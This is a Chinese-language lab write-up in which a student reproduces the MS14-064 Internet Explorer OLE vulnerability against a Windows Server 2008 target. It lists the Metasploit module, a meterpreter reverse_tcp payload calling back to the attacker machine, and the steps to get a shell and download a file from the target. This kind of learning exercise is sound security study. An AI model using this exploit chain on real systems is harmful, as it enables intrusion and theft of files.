ms14-064漏洞復現

本部落格最先發佈於我的個人部落格,如果方便,煩請移步恰醋的小屋查看,謝謝您!

這是我在實驗室學習滲透測試的第五個漏洞復現,一個多小時便完成了。學長給的要求只需完成查看靶機資訊、在指定位置創建文件夾兩項操作,我在看別的部落格時發現還可以利用該漏洞竊取文件,因此也自己嘗試了以下,寫在了部落格的最後。

漏洞介紹

MS14-064為Windows OLE自動化陣列遠程程式碼執行漏洞。當IE不作訪問記憶體中的對象時,存在遠程程式碼執行漏洞。OLE(對象鏈接與嵌入)是一種允許應用程式共享數據和功能的技術,遠程攻擊者利用此漏洞通過構造的網站執行任意程式碼,用戶使用IE瀏覽器查看該網站時允許遠程執行程式碼。

受影響的產品有:

  • Windows Server 2003
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows Vista
  • Windows XP
  • Windows 7
  • Windows 8
  • Windows 8.1
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT
  • Windows RT 8.1

實驗環境

攻擊機:Kali Linux: 192.168.227.128

靶機:Windows Server 2008: 192.168.227.130

復現步驟

  1. 使用msfconsole命令啟動msf,搜索ms14-064的漏洞資訊:

  2. 使用第一個攻擊模組,設置載荷

    use exploit/windows/browser/ms14_064_ole_code_execution # 使用第一個攻擊模組
    show payloads # 查看有效的攻擊載荷
    set payload windows/meterpreter/reverse_tcp # 設置反彈連接shell
    

    之後使用show options命令查看需要進行的設置。其中,AllowPowershellPrompt、SRVHOST和LHOST需要修改。AllowPowershellPrompt改為true,其餘兩個改為攻擊機IP。設置完成後,使用exploit命令生成惡意網站。

  3. 使用靶機用IE瀏覽器打開生成的惡意鏈接

  4. 返回Kali,已經生成了一個連接session了,按一下回車,輸入sessions -i 1連接,入侵靶機,打開shell,如果亂碼,則使用chcp 65001改變編碼,然後輸入whoami查看當前用戶。(第一次失敗了,我推斷可能是修改了編碼的原因,因為第二次打開shell後沒有修改編碼,發現成功了,之後又嘗試了修改編碼後輸入whoami,依然不成功)

  5. 嘗試在桌面上創建一個名為test的文件夾:

    返回windows server 2008查看,桌面上已經出現了相應的文件夾:

  6. 嘗試從靶機竊取文件
    在桌面創建一個名為secret的文件夾:

    使用dir命令查看,存在secret.txt文件,返回meterpreter,使用download命令下載文件:

    下載完成後,在目標目錄下查看,存在,說明竊取成功: